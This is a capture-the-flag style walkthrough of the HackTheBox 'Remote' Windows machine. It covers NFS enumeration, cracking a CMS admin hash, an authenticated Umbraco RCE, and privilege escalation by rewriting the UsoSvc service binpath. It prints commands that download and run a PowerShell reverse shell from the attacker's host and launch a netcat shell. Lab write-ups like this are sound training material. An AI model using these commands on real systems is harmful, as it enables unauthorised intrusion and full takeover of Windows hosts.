Hey fellas!! Its time for remote from hackthebox. This was an easy Windows machine. The initial foothold for the machine was based on CVE of a CMS and has a straight-forward privilege escalation to Administrator.
With all that said, let’s get started!!

Scan the host for the open ports and services.

# nmap -sC -sV -oA remote.nmap 10.10.10.180

The output revealed 3 interesting ports 21(ftp), 80(http), 111(rpcbind).
Unfortunately, Anonymous login on ftp did not return anything.
Since nfs was active, I ran another script from nmap for check for any available shares.

# nmap -sV --script=nfs-showmount -oN remote.nfs remote.htb

And I found the share

So I mounted the share on /mnt.

# mount -t nfs 10.10.10.180:/site_backups /mnt

After a bit of enumeration, I found out a Umbraco.sdf file that is a database file that could lead me to credentials. Also, I googled for Umbraco and found out that it is a content management system.

There was an admin hash encrypted with SHA1.
The hash was decrypted to baconandcheese.

Alongside manual enumeration, I ran a gobuster scan on http://10.10.10.180 that yielded a lot of directories.

There were a lot of misleading results, but /install led to something interesting. An Umbraco login page!!

So the email (admin@htb.local) and password (baconandcheese) obtained from Umbraco.sdf can be used here. And kudos, it worked!!

I searched the google for any exploits of Umbraco and found out Authenticated RCE over the version currently used. I found a similar exploit script here.
As a next step, I spawned up a reverse shell and got into the windows box.

Open up a nc listerner on port 4444
Set up python simplehttpserver on port 80
python -m SimpleHTTPServer 80
Copy the nishang script for reverse shell (Invoke-PowerShellTcp.ps1) to you working directory and add a line at the end of the file.

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.48 -Port 4444

Run the exploit with following arguments
# python exploit.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.48/Invoke-PowerShellTcp.ps1')"

And combining all the above points, you are into the box

We can now cd into C:\Users\Public and we get the user.txt

Now time to priv esc!!

I pulled up winPEAS.exe from my local machine to the windows box and enumerated.
Usosvc was running as Administrator. Therefore, the service can be abused into running our own command and hence can get a reverse shell.
I copied a nc.exe onto the windows machine.

> invoke-webrequest -Uri http://10.10.14.48/nc64.exe -OutFile nc.exe

Now using sc.exe, the added a reverse shell to the Usosvc service by changing the binpath to the path where nc.exe exists. Also started a netcat listener on a port on the attacking box. After starting the service, the cmdlet got executed with admin privileges and voila we got shell as
Administrator.

> sc.exe config UsoSvc binpath= “C:\Users\Public\nc.exe 10.10.14.48 4444 -e cmd.exe”
> sc.exe start UsoSvc

From the image above, its inferred that after querying the status of the Usosvc service, we have the command injection on the Binary Path Name that will further lead to privilege escalation upon execution.

Thats all for this post!! Thanks for reading. For more such content subscribe to my page
See you in the next one.Until then, Happy hunting!!